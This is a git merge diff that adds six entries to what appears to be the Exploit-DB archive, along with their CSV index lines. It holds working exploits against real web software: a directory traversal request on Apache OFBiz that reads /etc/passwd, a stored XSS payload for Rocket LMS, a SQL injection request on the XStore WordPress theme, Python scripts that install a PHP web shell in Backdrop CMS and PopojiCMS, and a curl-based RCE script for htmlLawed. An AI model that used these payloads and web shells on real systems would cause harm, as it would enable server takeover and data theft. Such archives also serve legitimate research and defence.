Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/java/webapps/52020.txt

@@ -0,0 +1,43 @@
+# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
+# Google Dork: N/A
+# Date: 2024-05-16
+# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
+# Vendor Homepage: https://ofbiz.apache.org/
+## Software Link: https://ofbiz.apache.org/download.html
+# Version: below <=18.12.12
+# Tested on: Windows10
+
+
+Poc.
+1-
+POST /webtools/control/xmlrpc HTTP/1.1
+Host: vulnerable-host.com
+Content-Type: text/xml
+
+<?xml version="1.0"?>
+<methodCall>
+  <methodName>example.createBlogPost</methodName>
+  <params>
+    <param>
+      <value><string>../../../../../../etc/passwd</string></value>
+    </param>
+  </params>
+</methodCall>
+
+OR
+
+2-
+POST /webtools/control/xmlrpc HTTP/1.1
+Host: vulnerable-host.com
+Content-Type: text/xml
+
+<?xml version="1.0"?>
+<methodCall>
+  <methodName>performCommand</methodName>
+  <params>
+    <param>
+
+<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
+    </param>
+  </params>
+</methodCall>

exploits/php/webapps/52018.tzt

@@ -0,0 +1,18 @@
+# Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)
+# Date: 04/16/2024
+# Exploit Author: Sergio Medeiros
+# Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
+# Software Link: https://lms.rocket-soft.org
+# Version: 1.9
+# Tested on Firefox and Chrome Browsers
+# Patched Version: Patch Pending
+# Category: Web Application
+# CVE: CVE-2024-34241
+# Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide
+# PoC:
+
+In order to exploit this systemic stored XSS vulnerability, identify theareas in the web application which has a WYSIWIG editor used, for example, the create/edit course description section.
+Input random text in the description section, and create the course while intercepting the request with BurpSuite or your preferred proxy of choice.
+
+In the *description* parameter or the associated parameter that is handling the user input related to the WYSIWIG editor, input the following payload and then issue the request:
+<details/open/ontoggle=prompt(origin)>

exploits/php/webapps/52019.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi
+# Google Dork: N/A
+# Date: 2024-05-16
+# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
+# Version: 5.3.5
+# Tested on: Windows10
+# CVE: CVE-2024-33559
+
+
+Poc
+<https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc>
+
+POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1

exploits/php/webapps/52021.py

@@ -0,0 +1,97 @@
+# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
+# Date: 04/27/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://backdropcms.org/
+# Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip
+# Version: latest
+# Tested on: MacOS
+
+import os
+import time
+import zipfile
+
+
+
+def create_files():
+info_content = """
+type = module
+name = Block
+description = Controls the visual building blocks a page is constructed
+with. Blocks are boxes of content rendered into an area, or region, of a
+web page.
+package = Layouts
+tags[] = Blocks
+tags[] = Site Architecture
+version = BACKDROP_VERSION
+backdrop = 1.x
+
+configure = admin/structure/block
+
+; Added by Backdrop CMS packaging script on 2024-03-07
+project = backdrop
+version = 1.27.1
+timestamp = 1709862662
+"""
+shell_info_path = "shell/shell.info"
+os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü
+oluşturur
+with open(shell_info_path, "w") as file:
+file.write(info_content)
+
+shell_content = """
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>
+"""
+shell_php_path = "shell/shell.php"
+with open(shell_php_path, "w") as file:
+file.write(shell_content)
+
+return shell_info_path, shell_php_path
+
+def create_zip(info_path, php_path):
+zip_filename = "shell.zip"
+with zipfile.ZipFile(zip_filename, 'w') as zipf:
+# Dosyaları shell klasörü altında sakla
+zipf.write(info_path, arcname='shell/shell.info')
+zipf.write(php_path, arcname='shell/shell.php')
+return zip_filename
+
+def main(url):
+print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
+time.sleep(3)
+
+print("Evil module generating...")
+time.sleep(2)
+
+info_path, php_path = create_files()
+zip_filename = create_zip(info_path, php_path)
+
+print("Evil module generated!", zip_filename)
+time.sleep(2)
+
+print("Go to " + url + "/admin/modules/install and upload the " +
+zip_filename + " for Manual Installation.")
+time.sleep(2)
+
+print("Your shell address:", url + "/modules/shell/shell.php")
+
+if __name__ == "__main__":
+import sys
+if len(sys.argv) < 2:
+print("Usage: python script.py [url]")
+else:
+main(sys.argv[1])

exploits/php/webapps/52022.py

@@ -0,0 +1,66 @@
+# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution
+# Date: 14/04/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.popojicms.org/
+# Software Link:
+https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
+# Version: Version : 2.0.1
+# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
+
+import requests
+import time
+import sys
+
+def exploit(url, username, password):
+
+login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin"
+login_data = {"username": username, "password": password}
+headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f
+"{url}/po-admin/index.php"}
+session = requests.Session()
+login_response = session.post(login_url, data=login_data, headers=headers)
+if "Administrator PopojiCMS" in login_response.text:
+print("Login Successful!")
+time.sleep(1) # 1 saniye bekle
+else:
+print("Login Failed!")
+return
+
+edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial"
+edit_data = {"meta_content": """<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+if(isset($_GET['cmd']))
+{
+system($_GET['cmd']);
+}
+?>
+</pre>
+</body>
+</html>"""}
+edit_response = session.post(edit_url, data=edit_data, headers=headers)
+if "cmd" in edit_response.text:
+print("Your shell is ready:", url)
+time.sleep(1)
+else:
+print("Exploit Failed!")
+return
+
+if __name__ == "__main__":
+if len(sys.argv) != 4:
+print("Kullanım: python exploit.py sitename username password")
+sys.exit(1)
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+print("Exploiting...")
+time.sleep(1)
+print("Logging in...")
+time.sleep(1)
+exploit(url, username, password)

exploits/php/webapps/52023.sh

@@ -0,0 +1,35 @@
+# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
+# Date: 2024-04-24
+# Exploit Author: Miguel Redondo (aka d4t4s3c)
+# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
+# Software Link: https://github.com/kesar/HTMLawed
+# Version: <= 1.2.5
+# Tested on: Linux
+# CVE: CVE-2022-35914
+
+banner(){
+  echo "  ______     _______     ____   ___ ____  ____      _________  ___  _ _  _"
+  echo " / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ / ___|/ _ \/ | || |"
+  echo "| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
+  echo "| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__   _|"
+  echo " \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/____/  /_/|_|  |_|"
+}
+
+while getopts ":u:c:" arg; do
+  case $arg in
+    u) URL=$OPTARG; let parameter_counter+=1 ;;
+    c) CMD=$OPTARG; let parameter_counter+=1 ;;
+  esac
+done
+
+
+if [ -z "$URL" ] || [ -z "$CMD" ]; then
+  banner
+  echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
+  exit
+else
+  banner
+  echo -e "\n[+] Command output:"
+fi
+
+curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'

files_exploits.csv

@@ -5463,6 +5463,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
 45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
 48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
+52020,exploits/java/webapps/52020.txt,"Apache OFBiz 18.12.12 - Directory Traversal",2024-05-19,"Abdualhadi khalifa",webapps,java,,2024-05-19,2024-05-19,0,CVE-2024-32113,,,,,
 47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,,2019-12-11,2019-12-11,0,CVE-2019-17554,"XML External Entity (XXE)",,,http://www.exploit-db.comOlingo-OData-4.6.0-source-release.zip,
 46759,exploits/java/webapps/46759.txt,"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting",2019-04-26,"Dhiraj Mishra",webapps,java,,2019-04-26,2019-04-26,0,CVE-2019-0186,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compluto-3.0.0-source-release.zip,
 47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,,2019-11-01,2020-04-16,0,CVE-2019-17558,,,,,
@@ -14585,6 +14586,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
+52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,,
 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
@@ -19785,6 +19787,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47588,exploits/php/webapps/47588.txt,"html5_snmp 1.11 - 'Router_ID' SQL Injection",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comhtml5_snmp-master.zip,
 27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",webapps,php,,2006-02-15,2013-07-31,1,,,,,,https://www.securityfocus.com/bid/16680/info
 29910,exploits/php/webapps/29910.txt,"HTMLEditBox 2.2 - 'config.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2327;OSVDB-35525,,,,,https://www.securityfocus.com/bid/23664/info
+52023,exploits/php/webapps/52023.sh,"htmlLawed 1.2.5 - Remote Code Execution (RCE)",2024-05-19,"Miguel Redondo",webapps,php,,2024-05-19,2024-05-19,0,CVE-2022-35914,,,,,
 22896,exploits/php/webapps/22896.txt,"HTMLToNuke - Cross-Site Scripting",2003-07-13,JOCANOR,webapps,php,,2003-07-13,2012-11-22,1,,,,,,https://www.securityfocus.com/bid/8174/info
 51979,exploits/php/webapps/51979.txt,"HTMLy Version v2.9.6 - Stored XSS",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
 2791,exploits/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",webapps,php,,2006-11-15,2016-09-16,1,CVE-2006-7134,,,,http://www.exploit-db.comupload.tar.gz,
@@ -28123,6 +28126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5788,exploits/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,webapps,php,,2008-06-10,,1,OSVDB-46100;CVE-2008-2753;OSVDB-46099;OSVDB-46098,,,,,http://www.bugreport.ir/?/42
 3121,exploits/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,webapps,php,,2007-01-11,,1,OSVDB-32807;CVE-2007-0307,,,,,
 31605,exploits/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 - Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,webapps,php,,2008-04-04,2014-02-12,1,CVE-2008-1787;OSVDB-44403,,,,,https://www.securityfocus.com/bid/28608/info
+52022,exploits/php/webapps/52022.py,"PopojiCMS 2.0.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,,
 51982,exploits/php/webapps/51982.txt,"PopojiCMS Version 2.0.1 - Remote Command Execution",2024-04-12,tmrswrr,webapps,php,,2024-04-12,2024-04-12,0,,,,,,
 4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,webapps,php,,2007-10-01,2016-10-12,1,OSVDB-37422;CVE-2007-5221,,,,http://www.exploit-db.compoppawid.2.7.tar.gz,
 2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php,,2006-09-11,2016-09-09,1,,,,,http://www.exploit-db.compopper-1.41-r2.tar.gz,
@@ -29035,6 +29039,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9553,exploits/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,webapps,php,,2009-08-30,2016-10-27,1,OSVDB-57588;CVE-2009-3252,,,,,
 34455,exploits/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,webapps,php,,2010-08-12,2014-08-28,1,CVE-2009-3252;OSVDB-57588,,,,,https://www.securityfocus.com/bid/42424/info
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
+52018,exploits/php/webapps/52018.tzt,"Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS)",2024-05-19,"Sergio Medeiros",webapps,php,,2024-05-19,2024-05-19,0,CVE-2024-34241,,,,,
 51437,exploits/php/webapps/51437.txt,"RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 39682,exploits/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",webapps,php,80,2016-04-11,2016-04-14,0,,,,,http://www.exploit-db.comrockmongo-1.1.7.tar.gz,
 11731,exploits/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,webapps,php,,2010-03-13,,0,,,,,http://www.exploit-db.comRogioBiz_PHP_file_manager_V1.2.zip,
@@ -34133,6 +34138,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49107,exploits/php/webapps/49107.txt,"Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting",2020-11-27,"Ilca Lucian Florin",webapps,php,,2020-11-27,2020-11-27,0,,,,,,
 51510,exploits/php/webapps/51510.py,"WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution",2023-06-09,"Mohammad Hossein Khanaki",webapps,php,,2023-06-09,2023-06-09,0,CVE-2021-24499,,,,,
 38063,exploits/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,webapps,php,,2012-11-26,2015-09-02,1,OSVDB-87870,,,,,https://www.securityfocus.com/bid/56691/info
+52019,exploits/php/webapps/52019.txt,"Wordpress Theme XStore 9.3.8 - SQLi",2024-05-19,"Abdualhadi khalifa",webapps,php,,2024-05-19,2024-05-19,0,CVE-2024-33559,,,,,
 47436,exploits/php/webapps/47436.txt,"WordPress Theme Zoner Real Estate - 4.1.1 Persistent Cross-Site Scripting",2019-09-27,m0ze,webapps,php,,2019-09-27,2019-09-27,0,,,,,,
 6336,exploits/php/webapps/6336.txt,"Words tag script 1.2 - 'word' SQL Injection",2008-08-31,"Hussin X",webapps,php,,2008-08-30,2016-12-20,1,OSVDB-47912;CVE-2008-3945,,,,,
 4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",2007-09-23,ShockShadow,webapps,php,,2007-09-22,2016-10-12,1,OSVDB-37223;CVE-2007-5102,,,,http://www.exploit-db.comwordsmith1.1_RC1.zip,